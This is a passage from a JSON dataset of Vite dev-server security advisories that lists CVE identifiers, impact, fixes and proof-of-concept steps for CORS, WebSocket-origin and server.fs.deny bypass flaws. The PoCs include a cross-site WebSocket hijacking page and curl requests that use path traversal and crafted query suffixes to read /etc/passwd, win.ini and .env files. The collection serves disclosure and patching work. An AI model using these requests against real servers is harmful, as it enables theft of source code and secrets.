"summary": "### Summary\nVite allowed any websites to send any requests to the development server and read the response due to default CORS settings and lack of validation on the Origin header for WebSocket connections.\n\n> [!WARNING]\n> This vulnerability even applies to users that only run the Vite dev server on the local machine and does not expose the dev server to the network.\n\n### Upgrade Path\nUsers that does not match either of the following conditions should be able to upgrade to a newer version of Vite that fixes the vulnerability without any additional configuration.\n\n- Using the backend integration feature\n- Using a reverse proxy in front of Vite\n- Accessing the development server via a domain other than `localhost` or `*.localhost`\n- Using a plugin / framework that connects to the WebSocket server on their own from the browser\n\n#### Using the backend integration feature\nIf you are using the backend integration feature and not setting [`server.origin`](https://vite.dev/config/server-options.html#server-origin), you need to add the origin of the backend server to the [`server.cors.origin`](https://github.com/expressjs/cors#configuration-options) option. Make sure to set a specific origin rather than `*`, otherwise any origin can access your development server.\n\n#### Using a reverse proxy in front of Vite\nIf you are using a reverse proxy in front of Vite and sending requests to Vite with a hostname other than `localhost` or `*.localhost`, you need to add the hostname to the new [`server.allowedHosts`](https://vite.dev/config/server-options.html#server-allowedhosts) option. For example, if the reverse proxy is sending requests to `http://vite:5173`, you need to add `vite` to the `server.allowedHosts` option.\n\n#### Accessing the development server via a domain other than `localhost` or `*.localhost`\nYou need to add the hostname to the new [`server.allowedHosts`](https://vite.dev/config/server-options.html#server-allowedhosts) option. For example, if you are accessing the development server via `http://foo.example.com:8080`, you need to add `foo.example.com` to the `server.allowedHosts` option.\n\n#### Using a plugin / framework that connects to the WebSocket server on their own from the browser\nIf you are using a plugin / framework, try upgrading to a newer version of Vite that fixes the vulnerability. If the WebSocket connection appears not to be working, the plugin / framework may have a code that connects to the WebSocket server on their own from the browser.\n\nIn that case, you can either:\n\n- fix the plugin / framework code to the make it compatible with the new version of Vite\n- set `legacy.skipWebSocketTokenCheck: true` to opt-out the fix for [2] while the plugin / framework is incompatible with the new version of Vite\n - When enabling this option, **make sure that you are aware of the security implications** described in the impact section of [2] above.\n\n### Mitigation without upgrading Vite\n#### [1]: Permissive default CORS settings\nSet `server.cors` to `false` or limit `server.cors.origin` to trusted origins.\n\n#### [2]: Lack of validation on the Origin header for WebSocket connections\nThere aren't any mitigations for this.\n\n#### [3]: Lack of validation on the Host header for HTTP requests\nUse Chrome 94+ or use HTTPS for the development server.\n\n### Details\n\nThere are three causes that allowed malicious websites to send any requests to the development server:\n\n#### [1]: Permissive default CORS settings\n\nVite sets the [`Access-Control-Allow-Origin`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin) header depending on [`server.cors`](https://vite.dev/config/server-options.html#server-cors) option. The default value was `true` which sets `Access-Control-Allow-Origin: *`. This allows websites on any origin to `fetch` contents served on the development server.\n\nAttack scenario:\n\n1. The attacker serves a malicious web page (`http://malicious.example.com`).\n2. The user accesses the malicious web page.\n3. The attacker sends a `fetch('http://127.0.0.1:5173/main.js')` request by JS in that malicious web page. This request is normally blocked by same-origin policy, but that's not the case for the reasons above.\n4. The attacker gets the content of `http://127.0.0.1:5173/main.js`.\n\n#### [2]: Lack of validation on the Origin header for WebSocket connections\n\nVite starts a WebSocket server to handle HMR and other functionalities. This WebSocket server [did not perform validation on the Origin header](https://github.com/vitejs/vite/blob/v6.0.7/packages/vite/src/node/server/ws.ts#L145-L157) and was vulnerable to Cross-Site WebSocket Hijacking (CSWSH) attacks. With that attack, an attacker can read and write messages on the WebSocket connection. Vite only sends some information over the WebSocket connection ([list of the file paths that changed, the file content where the errored happened, etc.](https://github.com/vitejs/vite/blob/v6.0.7/packages/vite/types/hmrPayload.d.ts#L12-L72)), but plugins can send arbitrary messages and may include more sensitive information.\n\nAttack scenario:\n\n1. The attacker serves a malicious web page (`http://malicious.example.com`).\n2. The user accesses the malicious web page.\n3. The attacker runs `new WebSocket('http://127.0.0.1:5173', 'vite-hmr')` by JS in that malicious web page.\n4. The user edits some files.\n5. Vite sends some HMR messages over WebSocket.\n6. The attacker gets the content of the HMR messages.\n\n#### [3]: Lack of validation on the Host header for HTTP requests\n\nUnless [`server.https`](https://vite.dev/config/server-options.html#server-https) is set, Vite starts the development server on HTTP. Non-HTTPS servers are vulnerable to DNS rebinding attacks without validation on the Host header. But Vite did not perform validation on the Host header. By exploiting this vulnerability, an attacker can send arbitrary requests to the development server bypassing the same-origin policy.\n\n1. The attacker serves a malicious web page that is served on **HTTP** (`http://malicious.example.com:5173`) (HTTPS won't work).\n2. The user accesses the malicious web page.\n3. The attacker changes the DNS to point to 127.0.0.1 (or other private addresses).\n4. The attacker sends a `fetch('/main.js')` request by JS in that malicious web page.\n5. The attacker gets the content of `http://127.0.0.1:5173/main.js` bypassing the same origin policy.\n\n### Impact\n#### [1]: Permissive default CORS settings\nUsers with the default `server.cors` option may:\n\n- get the source code stolen by malicious websites\n- give the attacker access to functionalities that are not supposed to be exposed externally\n - Vite core does not have any functionality that causes changes somewhere else when receiving a request, but plugins may implement those functionalities and servers behind `server.proxy` may have those functionalities.\n\n#### [2]: Lack of validation on the Origin header for WebSocket connections\nAll users may get the file paths of the files that changed and the file content where the error happened be stolen by malicious websites.\n\nFor users that is using a plugin that sends messages over WebSocket, that content may be stolen by malicious websites.\n\nFor users that is using a plugin that has a functionality that is triggered by messages over WebSocket, that functionality may be exploited by malicious websites.\n\n#### [3]: Lack of validation on the Host header for HTTP requests\nUsers using HTTP for the development server and using a browser that is not Chrome 94+ may:\n\n- get the source code stolen by malicious websites\n- give the attacker access to functionalities that are not supposed to be exposed externally\n - Vite core does not have any functionality that causes changes somewhere else when receiving a request, but plugins may implement those functionalities and servers behind `server.proxy` may have those functionalities.\n\nChrome 94+ users are not affected for [3], because [sending a request to a private network page from public non-HTTPS page is forbidden](https://developer.chrome.com/blog/private-network-access-update#chrome_94) since Chrome 94.\n\n### Related Information\nSafari has [a bug that blocks requests to loopback addresses from HTTPS origins](https://bugs.webkit.org/show_bug.cgi?id=171934). This means when the user is using Safari and Vite is listening on lookback addresses, there's another condition of \"the malicious web page is served on HTTP\" to make [1] and [2] to work.\n\n### PoC\n#### [2]: Lack of validation on the Origin header for WebSocket connections\n1. I used the `react` template which utilizes HMR functionality.\n\n```\nnpm create vite@latest my-vue-app-react -- --template react\n```\n\n2. Then on a malicious server, serve the following POC html:\n```html\n<!doctype html>\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\" />\n <title>vite CSWSH</title>\n </head>\n <body>\n <div id=\"logs\"></div>\n <script>\n const div = document.querySelectorAll('#logs')[0];\n const ws = new WebSocket('ws://localhost:5173','vite-hmr');\n ws.onmessage = event => {\n const logLine = document.createElement('p');\n logLine.innerHTML = event.data;\n div.append(logLine);\n };\n </script>\n </body>\n</html>\n```\n\n3. Kick off Vite \n\n```\nnpm run dev\n```\n\n4. Load the development server (open `http://localhost:5173/`) as well as the malicious page in the browser. \n5. Edit `src/App.jsx` file and intentionally place a syntax error\n6. Notice how the malicious page can view the websocket messages and a snippet of the source code is exposed\n\nHere's a video demonstrating the POC:\n\nhttps://github.com/user-attachments/assets/a4ad05cd-0b34-461c-9ff6-d7c8663d6961",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-01-21T19:52:55Z",
"updated_at": "2026-02-04T04:37:03.076966Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-vg6x-rcgg-rjx6",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-24010",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2025-24010",
"GHSA-vg6x-rcgg-rjx6"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary",
"dom-sink-hardening",
"token-cookie-storage",
"plugin-extension-trust-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2025-30208": {
"canonical_id": "vite--CVE-2025-30208",
"title": "Vite bypasses server.fs.deny when using ?raw??",
"summary": "### Summary\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\nOnly apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n`@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes.\n\n### PoC\n```bash\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n\n$ echo \"top secret content\" > /tmp/secret.txt\n\n# expected behaviour\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt\"\n\n <body>\n <h1>403 Restricted</h1>\n <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.\n\n# security bypassed\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt?import&raw??\"\nexport default \"top secret content\\n\"\n//# sourceMappingURL=data:application/json;base64,eyJ2...\n```",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-03-25T14:00:02Z",
"updated_at": "2026-02-04T03:13:24.371631Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-30208",
"https://github.com/vitejs/vite/commit/315695e9d97cc6cfa7e6d9e0229fb50cdae3d9f4",
"https://github.com/vitejs/vite/commit/80381c38d6f068b12e6e928cd3c616bd1d64803c",
"https://github.com/vitejs/vite/commit/807d7f06d33ab49c48a2a3501da3eea1906c0d41",
"https://github.com/vitejs/vite/commit/92ca12dc79118bf66f2b32ff81ed09e0d0bd07ca",
"https://github.com/vitejs/vite/commit/f234b5744d8b74c95535a7b82cc88ed2144263c1",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2025-30208",
"GHSA-x574-m823-4x7w"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2025-31125": {
"canonical_id": "vite--CVE-2025-31125",
"title": "Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query",
"summary": "### Summary\n\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\nOnly apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n\n- base64 encoded content of non-allowed files is exposed using `?inline&import` (originally reported as `?import&?inline=1.wasm?init`)\n- content of non-allowed files is exposed using `?raw?import`\n\n`/@fs/` isn't needed to reproduce the issue for files inside the project root.\n\n### PoC\n\nOriginal report (check details above for simplified cases):\n\nThe ?import&?inline=1.wasm?init ending allows attackers to read arbitrary files and returns the file content if it exists. Base64 decoding needs to be performed twice\n```\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n```\n\nExample full URL `http://localhost:5173/@fs/C:/windows/win.ini?import&?inline=1.wasm?init`",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-03-31T17:31:54Z",
"updated_at": "2026-02-04T04:37:24.129476Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-4r4m-qw57-chr8",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-31125",
"https://github.com/vitejs/vite/commit/59673137c45ac2bcfad1170d954347c1a17ab949",
"https://github.com/vitejs/vite",
"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-31125"
],
"aliases": [
"CVE-2025-31125",
"GHSA-4r4m-qw57-chr8"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2025-31486": {
"canonical_id": "vite--CVE-2025-31486",
"title": "Vite allows server.fs.deny to be bypassed with .svg or relative paths",
"summary": "### Summary\n\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\n\nOnly apps explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n\n#### `.svg`\n\nRequests ending with `.svg` are loaded at this line.\nhttps://github.com/vitejs/vite/blob/037f801075ec35bb6e52145d659f71a23813c48f/packages/vite/src/node/plugins/asset.ts#L285-L290\nBy adding `?.svg` with `?.wasm?init` or with `sec-fetch-dest: script` header, the restriction was able to bypass.\n\nThis bypass is only possible if the file is smaller than [`build.assetsInlineLimit`](https://vite.dev/config/build-options.html#build-assetsinlinelimit) (default: 4kB) and when using Vite 6.0+.\n\n#### relative paths\n\nThe check was applied before the id normalization. This allowed requests to bypass with relative paths (e.g. `../../`).\n\n### PoC\n\n```bash\nnpm create vite@latest\ncd vite-project/\nnpm install\nnpm run dev\n```\n\nsend request to read `etc/passwd`\n\n```bash\ncurl 'http://127.0.0.1:5173/etc/passwd?.svg?.wasm?init'\n```\n\n```bash\ncurl 'http://127.0.0.1:5173/@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw'\n```",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-04-04T14:20:05Z",
"updated_at": "2026-02-04T03:51:38.412061Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-xcj6-pq6g-qj4x",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-31486",
"https://github.com/vitejs/vite/commit/62d7e81ee189d65899bb65f3263ddbd85247b647",
"https://github.com/vitejs/vite",
"https://github.com/vitejs/vite/blob/037f801075ec35bb6e52145d659f71a23813c48f/packages/vite/src/node/plugins/asset.ts#L285-L290"
],
"aliases": [
"CVE-2025-31486",
"GHSA-xcj6-pq6g-qj4x"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary",
"plugin-extension-trust-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2025-32395": {
"canonical_id": "vite--CVE-2025-32395",
"title": "Vite has an `server.fs.deny` bypass with an invalid `request-target`",
"summary": "### Summary\nThe contents of arbitrary files can be returned to the browser if the dev server is running on Node or Bun.\n\n### Impact\nOnly apps with the following conditions are affected.\n\n- explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host))\n- running the Vite dev server on runtimes that are not Deno (e.g. Node, Bun)\n\n### Details\n\n[HTTP 1.1 spec (RFC 9112) does not allow `#` in `request-target`](https://datatracker.ietf.org/doc/html/rfc9112#section-3.2). Although an attacker can send such a request. For those requests with an invalid `request-line` (it includes `request-target`), the spec [recommends to reject them with 400 or 301](https://datatracker.ietf.org/doc/html/rfc9112#section-3.2-4). The same can be said for HTTP 2 ([ref1](https://datatracker.ietf.org/doc/html/rfc9113#section-8.3.1-2.4.1), [ref2](https://datatracker.ietf.org/doc/html/rfc9113#section-8.3.1-3), [ref3](https://datatracker.ietf.org/doc/html/rfc9113#section-8.1.1-3)).\n\nOn Node and Bun, those requests are not rejected internally and is passed to the user land. For those requests, the value of [`http.IncomingMessage.url`](https://nodejs.org/docs/latest-v22.x/api/http.html#messageurl) contains `#`. Vite assumed `req.url` won't contain `#` when checking `server.fs.deny`, allowing those kinds of requests to bypass the check.\n\nOn Deno, those requests are not rejected internally and is passed to the user land as well. But for those requests, the value of `http.IncomingMessage.url` did not contain `#`. \n\n### PoC\n```\nnpm create vite@latest\ncd vite-project/\nnpm install\nnpm run dev\n```\nsend request to read `/etc/passwd`\n```\ncurl --request-target /@fs/Users/doggy/Desktop/vite-project/#/../../../../../etc/passwd http://127.0.0.1:5173\n```",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
"published_at": "2025-04-11T14:06:03Z",
"updated_at": "2026-02-04T04:11:44.900383Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-356w-63v5-8wf4",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-32395",
"https://github.com/vitejs/vite/commit/175a83909f02d3b554452a7bd02b9f340cdfef70",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2025-32395",
"GHSA-356w-63v5-8wf4"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2025-46565": {
"canonical_id": "vite--CVE-2025-46565",
"title": "Vite's server.fs.deny bypassed with /. for files under project root",
"summary": "### Summary\nThe contents of files in [the project `root`](https://vite.dev/config/shared-options.html#root) that are denied by a file matching pattern can be returned to the browser.\n\n### Impact\n\nOnly apps explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\nOnly files that are under [project `root`](https://vite.dev/config/shared-options.html#root) and are denied by a file matching pattern can be bypassed.\n\n- Examples of file matching patterns: `.env`, `.env.*`, `*.{crt,pem}`, `**/.env`\n- Examples of other patterns: `**/.git/**`, `.git/**`, `.git/**/*`\n\n### Details\n[`server.fs.deny`](https://vite.dev/config/server-options.html#server-fs-deny) can contain patterns matching against files (by default it includes `.env`, `.env.*`, `*.{crt,pem}` as such patterns).\nThese patterns were able to bypass for files under `root` by using a combination of slash and dot (`/.`).\n\n### PoC\n```\nnpm create vite@latest\ncd vite-project/\ncat \"secret\" > .env\nnpm install\nnpm run dev\ncurl --request-target /.env/. http://localhost:5173\n```\n\n![image](https://github.com/user-attachments/assets/822f4416-aa42-461f-8c95-a88d155e674b)\n![image](https://github.com/user-attachments/assets/42902144-863a-4afb-ac5b-fc16effa37cc)",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
"published_at": "2025-04-30T17:40:27Z",
"updated_at": "2026-02-04T03:27:17.681639Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-859w-5945-r5v3",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-46565",
"https://github.com/vitejs/vite/commit/c22c43de612eebb6c182dd67850c24e4fab8cacb",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2025-46565",
"GHSA-859w-5945-r5v3"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2025-58751": {
"canonical_id": "vite--CVE-2025-58751",
"title": "Vite middleware may serve files starting with the same name with the public directory",
"summary": "### Summary\nFiles starting with the same name with the public directory were served bypassing the `server.fs` settings.\n\n### Impact\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using --host or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host))\n- uses [the public directory feature](https://vite.dev/guide/assets.html#the-public-directory) (enabled by default)\n- a symlink exists in the public directory\n\n### Details\nThe [servePublicMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L79) function is in charge of serving public files from the server. It returns the [viteServePublicMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L106) function which runs the needed tests and serves the page. The viteServePublicMiddleware function [checks if the publicFiles variable is defined](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L111), and then uses it to determine if the requested page is public. In the case that the publicFiles is undefined, the code will treat the requested page as a public page, and go on with the serving function. [publicFiles may be undefined if there is a symbolic link anywhere inside the public directory](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/publicDir.ts#L21). In that case, every requested page will be passed to the public serving function. The serving function is based on the [sirv](https://github.com/lukeed/sirv) library. Vite patches the library to add the possibility to test loading access to pages, but when the public page middleware [disables this functionality](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L89) since public pages are meant to be available always, regardless of whether they are in the allow or deny list.\n\nIn the case of public pages, the serving function is [provided with the path to the public directory](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L85) as a root directory. The code of the sirv library [uses the join function to get the full path to the requested file](https://github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L42). For example, if the public directory is \"/www/public\", and the requested file is \"myfile\", the code will join them to the string \"/www/public/myfile\". The code will then pass this string to the normalize function. Afterwards, the code will [use the string's startsWith function](https://github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L43) to determine whether the created path is within the given directory or not. Only if it is, it will be served.\n\nSince [sirv trims the trailing slash of the public directory](https://github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L119), the string's startsWith function may return true even if the created path is not within the public directory. For example, if the server's root is at \"/www\", and the public directory is at \"/www/p\", if the created path will be \"/www/private.txt\", the startsWith function will still return true, because the string \"/www/private.txt\" starts with\u00a0 \"/www/p\". To achieve this, the attacker will use \"..\" to ask for the file \"../private.txt\". The code will then join it to the \"/www/p\" string, and will receive \"/www/p/../private.txt\". Then, the normalize function will return \"/www/private.txt\", which will then be passed to the startsWith function, which will return true, and the processing of the page will continue without checking the deny list (since this is the public directory middleware which doesn't check that).\n\n### PoC\nExecute the following shell commands:\n\n```\nnpm create vite@latest\ncd vite-project/\nmkdir p\ncd p\nln -s a b\ncd ..\necho 'import path from \"node:path\"; import { defineConfig } from \"vite\"; export default defineConfig({publicDir: path.resolve(__dirname, \"p/\"), server: {fs: {deny: [path.resolve(__dirname, \"private.txt\")]}}})' > vite.config.js\necho \"secret\" > private.txt\nnpm install\nnpm run dev\n```\n\nThen, in a different shell, run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/private.txt'`\n\nYou will receive a 403 HTTP Response,\u00a0 because private.txt is denied.\n\nNow in the same shell run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/../private.txt'`\n\nYou will receive the contents of private.txt.\n\n### Related links\n- https://github.com/lukeed/sirv/commit/f0113f3f8266328d804ee808f763a3c11f8997eb",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
"published_at": "2025-09-09T20:55:56Z",
"updated_at": "2026-02-04T04:33:22.508417Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-g4jq-h2w9-997c",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-58751",
"https://github.com/lukeed/sirv/commit/f0113f3f8266328d804ee808f763a3c11f8997eb",
"https://github.com/vitejs/vite/commit/09f2b52e8d5907f26602653caf41b3a56692600d",
"https://github.com/vitejs/vite/commit/4f1c35bcbb5830290c694aa14b6789e07450f069",
"https://github.com/vitejs/vite/commit/63e2a5d232218f3f8d852056751e609a5367aaec",
"https://github.com/vitejs/vite/commit/e11d24008b97d4ca731ecc1a3b95260a6d12e7e0",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2025-58751",
"GHSA-g4jq-h2w9-997c"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2025-58752": {
"canonical_id": "vite--CVE-2025-58752",
"title": "Vite's `server.fs` settings were not applied to HTML files",
"summary": "### Summary\nAny HTML files on the machine were served regardless of the `server.fs` settings.\n\n### Impact\n\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host))\n- `appType: 'spa'` (default) or `appType: 'mpa'` is used\n\nThis vulnerability also affects the preview server. The preview server allowed HTML files not under the output directory to be served.\n\n### Details\nThe [serveStaticMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L123) function is in charge of serving static files from the server. It returns the [viteServeStaticMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L136) function which runs the needed tests and serves the page. The viteServeStaticMiddleware function [checks if the extension of the requested file is \".html\"](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L144). If so, it doesn't serve the page. Instead, the server will go on to the next middlewares, in this case [htmlFallbackMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/htmlFallback.ts#L14), and then to [indexHtmlMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/indexHtml.ts#L438). These middlewares don't perform any test against allow or deny rules, and they don't make sure that the accessed file is in the root directory of the server. They just find the file and send back its contents to the client.\n\n### PoC\nExecute the following shell commands:\n\n```\nnpm create vite@latest\ncd vite-project/\necho \"secret\" > /tmp/secret.html\nnpm install\nnpm run dev\n```\n\nThen, in a different shell, run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/../../../../../../../../../../../tmp/secret.html'`\n\nThe contents of /tmp/secret.html will be returned.\n\nThis will also work for HTML files that are in the root directory of the project, but are in the deny list (or not in the allow list). Test that by stopping the running server (CTRL+C), and running the following commands in the server's shell:\n\n```\necho 'import path from \"node:path\"; import { defineConfig } from \"vite\"; export default defineConfig({server: {fs: {deny: [path.resolve(__dirname, \"secret_files/*\")]}}})' > [vite.config.js](http://vite.config.js)\nmkdir secret_files\necho \"secret txt\" > secret_files/secret.txt\necho \"secret html\" > secret_files/secret.html\nnpm run dev\n\n```\n\nThen, in a different shell, run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/secret_files/secret.txt'`\n\nYou will receive a 403 HTTP Response,\u00a0 because everything in the secret_files directory is denied.\n\nNow in the same shell run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/secret_files/secret.html'`\n\nYou will receive the contents of secret_files/secret.html.",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
"published_at": "2025-09-09T20:54:42Z",
"updated_at": "2026-02-04T04:35:16.287471Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-jqfw-vq24-v9c3",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-58752",
"https://github.com/vitejs/vite/commit/0ab19ea9fcb66f544328f442cf6e70f7c0528d5f",
"https://github.com/vitejs/vite/commit/14015d794f69accba68798bd0e15135bc51c9c1e",
"https://github.com/vitejs/vite/commit/482000f57f56fe6ff2e905305100cfe03043ddea",
"https://github.com/vitejs/vite/commit/6f01ff4fe072bcfcd4e2a84811772b818cd51fe6",
"https://github.com/vitejs/vite",
"https://github.com/vitejs/vite/blob/v7.1.5/packages/vite/CHANGELOG.md"
],
"aliases": [
"CVE-2025-58752",
"GHSA-jqfw-vq24-v9c3"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary",
"plugin-extension-trust-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2025-62522": {
"canonical_id": "vite--CVE-2025-62522",
"title": "vite allows server.fs.deny bypass via backslash on Windows",
"summary": "### Summary\nFiles denied by [`server.fs.deny`](https://vitejs.dev/config/server-options.html#server-fs-deny) were sent if the URL ended with `\\` when the dev server is running on Windows.\n\n### Impact\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using --host or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host))\n- running the dev server on Windows\n\n### Details\n`server.fs.deny` can contain patterns matching against files (by default it includes `.env`, `.env.*`, `*.{crt,pem}` as such patterns). These patterns were able to bypass by using a back slash(`\\`). The root cause is that `fs.readFile('/foo.png/')` loads `/foo.png`.\n\n### PoC\n```shell\nnpm create vite@latest\ncd vite-project/\ncat \"secret\" > .env\nnpm install\nnpm run dev\ncurl --request-target /.env\\ http://localhost:5173\n```\n<img width=\"1593\" height=\"616\" alt=\"image\" src=\"https://github.com/user-attachments/assets/36212f4e-1d3c-4686-b16f-16b35ca9e175\" />",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
